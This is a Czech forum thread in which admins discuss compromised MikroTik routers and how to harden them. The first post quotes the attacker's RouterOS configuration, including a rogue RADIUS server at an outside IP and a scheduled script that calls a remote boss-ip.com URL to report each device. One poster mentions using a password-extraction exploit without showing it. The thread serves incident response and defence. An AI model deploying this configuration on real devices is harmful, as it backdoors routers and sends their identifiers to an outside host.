MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[hapi]

A máme to tu zase... Kromě klasiky (změny DNS) to dělá i jiné skopičiny:

Kód: Vybrat vše

/system identity
set name=test
/ip pool
add name=pool1 ranges=10.1.1.2-10.1.1.250
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes
/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/system scheduler
add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source=\
    "{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=XXXXXXXXXX&action=upload&sncode=YYYYYYYY&dynamic=static\")}"


Na přístup si to vytváří nového uživatele ("Admin" - opravdu s velkým A) v systému a radius. V tom skriptu je XXXXXXX nějaký kód zatím v každém RB unikátní, totéž YYYYYYYY, jehož součástí je i sériové číslo routerboardu. Na některých byla vytvořená i nějaká maškaráda v NAT. Výše uvedený výpis pochází z napadeného zařízení, které běží na ROS i firmware 6.42.3 a kterému bylo jméno i heslo pro přístup změněno před několika málo dny.

Už se to řeší i na fóru MikroTiku:
https://forum.mikrotik.com/viewtopic.php?t=135762
https://forum.mikrotik.com/viewtopic.php?f=2&t=135774

Setkal se s tím už někdo zdejší?

jo jo, právě sem na to PPP taky teď přišel že je nastavený. Teď mě trochu víc děsí ta věc, že kolem oběda se na problém přišlo, zkontroloval se firewall atd.. a hlavně sem se podíval do scheduleru a scriptů a dal bych nevím co že tam scripty nebyly a ted tam jsou a přitom firewall tam je na dropu

MKv6.42.4

[Myghael]

Tak u nás zatím problém řeší omezení winboxu a SSH na naše IP v /ip services, vše ostatní tamtéž zcela vypnuto. Firewall nijak speciální nemáme, povolit established, related, povolit vše z lokálu, povolit zvenčí jen to co je třeba a pak drop všeho, takže úplná klasika. Tam, kde to takto máme, se problém nevyskytl, a to ani se staršími verzemi. RB v defaultu strčené na veřejku se nakazí tak do 10 minut, ať už je tam 6.10 nebo 6.42.5, historické verze (3.30, 4.17, 5.25) tímto problémem zjevně netrpí.

[Dalibor Toman]

tak máme taky kontaminaci. Hlavní router i přes input drop na wan straně a je nakaženej. Přístup má pouze 6 ip adres. Je teda pravda že jsme takhle silnej drop zapnuly asi před týdnem když tam byla od někoho hláška aby jsme upgradovaly, což jsme udělaly na aktuálně největší což byla 6.42.4, zapnuli input drop a dneska tam vidíme přepsaný identity a ve files dva soubory.

IMHO jsou 2 moznosti:
1) pri tom prvnim nakazeni (mozna ten whitehacker nebyl jediny kdo se dostal do systemu), se do systemu dostal nejakej backdoor, kterej prezije upgrade (netinstall se predpokladam nekonal). Jestli ma ROS nejaky vychytavky, ktery umi spustit kod z jinych particii apod, bylo by to mozne (a blbe). Backdoor/malware si pak sam zavola domu (cili input firewall ho nezastavi)
2) fakt neco prostreli firewall. Zkousel jsem si jeden MT prepnout fo devel-mode a je videt, ze k firewalovani se pouzivaji iptables. Bohuzel jsem nemel k dispozici utilitu iptables k vypisu pravidel, takze jsem se nemohl podivat, co v nich realne je. Jestli se vytvareji nejake pred winboxem skryta pravidla, pripadne nejake pravidla lze prostrelit, pak je to taky dost spatne.

Na nasich MT jsem zatim prakticky zadny problem nezaznamenal. Infrastrukturni maji ale vsechny privatni IPcka aty co slouzi k pripojeni zakazniku, maji na wanu privatku a na LANu verejnou gateway IP zakaznika a krome firewallu v ROSu tyhle verejny IP blokuje pro cokoliv mimo nasi sit (mimo ICMP) linuxova gateway v ceste. Zakaznik ma zakazany posilat packety s privatnima adresama do nasi site (cili se na nase MT nedostane).
Jina vec je, kdyz si zakaznik jako WiFi router nasadi Mikrotik (zakaznici maji verejne IP). Ty byly vetsinou nakazene uz v breznu. A na upozorneni na problem reaguje (spravne) jen zlomek.

[hapi]

Tak u nás zatím problém řeší omezení winboxu a SSH na naše IP v /ip services, vše ostatní tamtéž zcela vypnuto. Firewall nijak speciální nemáme, povolit established, related, povolit vše z lokálu, povolit zvenčí jen to co je třeba a pak drop všeho, takže úplná klasika. Tam, kde to takto máme, se problém nevyskytl, a to ani se staršími verzemi. RB v defaultu strčené na veřejku se nakazí tak do 10 minut, ať už je tam 6.10 nebo 6.42.5, historické verze (3.30, 4.17, 5.25) tímto problémem zjevně netrpí.

takže ty říkáš že se nakazí i čistá 6.42.5? mikrotik na foru píše že to není možné.

[Myghael]

Vzal jsem úplně nový RBM33G, rozbalil, nahrál ROS 6.42.5, upgradnul firmware a samozřejmě změnil login i heslo, jinak jsem to kromě nastavení veřejné IP adresy (+ default route a DNS) nechal v tom základním nastavení od MikroTiku, včetně toho základního firewall typu "všechno zevnitř povol, všechno zvenku zahoď". Připojil jsem to na internet tak, aby na to nemohlo nějaké zavirované RB u nás v síti a za 10 minut tam byl ten čínský skript. Přiznám se, že fórum mikrotiku jsem před tímto pokusem nečetl.

[hapi]

jaká je šance že máš nakaženej počítač a automaticky to tam nahraje?

[basty]

Vzal jsem úplně nový RBM33G, rozbalil, nahrál ROS 6.42.5, upgradnul firmware a samozřejmě změnil login i heslo, jinak jsem to kromě nastavení veřejné IP adresy (+ default route a DNS) nechal v tom základním nastavení od MikroTiku, včetně toho základního firewall typu "všechno zevnitř povol, všechno zvenku zahoď". Připojil jsem to na internet tak, aby na to nemohlo nějaké zavirované RB u nás v síti a za 10 minut tam byl ten čínský skript. Přiznám se, že fórum mikrotiku jsem před tímto pokusem nečetl.

V tom případě se nedá moc jak bránit.

[Myghael]

jaká je šance že máš nakaženej počítač a automaticky to tam nahraje?

To mě samozřejmě napadlo taky, proto jsem ten pokusný board nahrával z nové čisté instalace Ubuntu, pro jistotu dokonce mimo svou síť. Každopádně i po projetí několika různými softwary jsem ve svém linuxovém desktopu žádný virus, trojana ani nic podobného nenašel. Každopádně bych to v tom případě měl v mikroticích na domácí síti, a ty napadeny nebyly, včetně hlavního routeru, který má veřejné adresy hned dvě.

V tom případě se nedá moc jak bránit.

Dá, kromě dobrého firewallu je zapotřebí také nemít login "admin" a v /ip services mít všechno vypnuto, nebo omezeno na přístup jen z vnitřní sítě. Na výše zmíněném hlavním domácím routeru s dvojicí veřejných k nákaze nedošlo, mám tam ale povolen jen telnet, ssh a winbox a to ještě jen z rozsahů domácí sítě (+ ve firewallu ochranu proti spoofingu), ostatně na vzdálenou správu je tu VPN (byť nutnost ji vytáčet není moc pohodlná). I ta nešťastná M33G po netinstallu a aplikaci těchto pravidel v pohodě odolává bez ohledu na aktuální verzi firmwaru.

[basty]

Já jsem změnil porty pro winbox a ssh a taky to drží.

[Myghael]

Některé botnety skenují různé porty, tuhle se někdo snažil nalámat do SSH serverů s porty 488, 1302 nebo 33404. Změna výchozích portů je určitě ku prospěchu, ale je to pouze doplňkové opatření.

[mpcz]

Vzal jsem úplně nový RBM33G, rozbalil, nahrál ROS 6.42.5, upgradnul firmware a samozřejmě změnil login i heslo, jinak jsem to kromě nastavení veřejné IP adresy (+ default route a DNS) nechal v tom základním nastavení od MikroTiku, včetně toho základního firewall typu "všechno zevnitř povol, všechno zvenku zahoď". Připojil jsem to na internet tak, aby na to nemohlo nějaké zavirované RB u nás v síti a za 10 minut tam byl ten čínský skript. Přiznám se, že fórum mikrotiku jsem před tímto pokusem nečetl.

Tak toto se mi moc nezdá. Sice tomu nic moc nerozumím, ale selský rozum mi říká, že to by musela situace na sítích vypadat o dost jinak. Kromě toho, pokud by nákaza probíhala tak rychle, tak by nemohl být problém komunikaci odchytit a zjistit, o co jde a jak to virus dělá a z toho vyrobit účinnější ochranu. Jen přehození portu na winboxu musí udělat útočníkovi vrásky na čele. Scanování portů po jednom je pravděpodobně hodně práce a času a dá se na to lehce přijít. Změna portu je dle mého jedno z nejjednodušších řešení a docela účinné, dokonce bych se přimlouval pro možnost to ve winboxu nastavit implicitně. Kromě toho i v logu by musela zůstat nějaká stopa, či IP adresa (třeba i falešná) odkud to přišlo. mpcz, 30.6.2018

[hapi]

no tak počkat, psal si že defaultní firewall od mk to prorazilo. Teď nevim jak vypadá ale předpokládám že drop všechno z venku takže co je lepší firewall než drop všeho z venku?

[hapi]

Vzal jsem úplně nový RBM33G, rozbalil, nahrál ROS 6.42.5, upgradnul firmware a samozřejmě změnil login i heslo, jinak jsem to kromě nastavení veřejné IP adresy (+ default route a DNS) nechal v tom základním nastavení od MikroTiku, včetně toho základního firewall typu "všechno zevnitř povol, všechno zvenku zahoď". Připojil jsem to na internet tak, aby na to nemohlo nějaké zavirované RB u nás v síti a za 10 minut tam byl ten čínský skript. Přiznám se, že fórum mikrotiku jsem před tímto pokusem nečetl.

Tak toto se mi moc nezdá. Sice tomu nic moc nerozumím, ale selský rozum mi říká, že to by musela situace na sítích vypadat o dost jinak. Kromě toho, pokud by nákaza probíhala tak rychle, tak by nemohl být problém komunikaci odchytit a zjistit, o co jde a jak to virus dělá a z toho vyrobit účinnější ochranu. Jen přehození portu na winboxu musí udělat útočníkovi vrásky na čele. Scanování portů po jednom je pravděpodobně hodně práce a času a dá se na to lehce přijít. Kromě toho i v logu by musela zůstat nějaká stopa, či IP adresa (třeba i falešná) odkud to přišlo. mpcz, 30.6.2018

hraju si tu s explodem na zjištění hesla a v logu nezůstane nic ale heslo mám. Z nějakýho důvodu z testovací 6.40.4 heslo dostanu ale z 250 dnů běžící na x86 ne.

[basty]

Právě proto je tedy hodně divný že když všechno zakazu, tak se to tam vubec dostane a tak rychle. To musí prostě být jiná cesta do toho mimo firewall.

[Myghael]

Zase tolik jsem si s tím nehrál, šlo mi jen o nalezení účinného protiopatření, jen firewall nestačí.

no tak počkat, psal si že defaultní firewall od mk to prorazilo. Teď nevim jak vypadá ale předpokládám že drop všechno z venku takže co je lepší firewall než drop všeho z venku?

Drop všeho z venku, ale k tomu disablovat nepoužívané services a ty používané omezit na vlastní rozsahy. Spolu s tím uživatelským jménem a heslem, případně i změnou portů už by to mohla být spolehlivá ochrana, jelikož žádné zařízení s tímto vším infikováno nebylo bez ohledu na instalovanou verzi RouterOS, kdy v těch nových kam až vím "akorát" zalátali nějaké zranitelnosti webového rozhraní. Jen ten samotný firewall zjevně nestačil.

Změna portu je dle mého jedno z nejjednodušších řešení a docela účinné, dokonce bych se přimlouval pro možnost to ve winboxu nastavit implicitně. Kromě toho i v logu by musela zůstat nějaká stopa, či IP adresa (třeba i falešná) odkud to přišlo. mpcz, 30.6.2018

V logu kupodivu nic, kromě standardních skenů a jejich neúspěšných pokusů o přihlášení. Porty lze měnit ve winboxu již nyní, pokud chceš ochránit větší množství zařízení, není to problém přidat do nějaké "výchozí konfigurace" k věcem typu nastavení SNMP, MGMT VLAN, NTP klienta nebo připojení syslog serveru, případně do příkazů pro skript prolézající celou síť. Dávat nějaké náhodné porty už ve výchozí konfiguraci bych rozhodně nedoporučoval. RouterOS není pro amatéry, takže zabezpečení je věcí každého admina. Ve výchozím stavu by tak měl být co nejsnáze dostupný, nestandardní porty si přeci nastavím tou výchozí konfigurací. Pokud tedy nepíšete ručně do všeho i ty věci, které jsou všude stejné, ale to je na facku i u větší domácí sítě, ne tak u sítě ISP.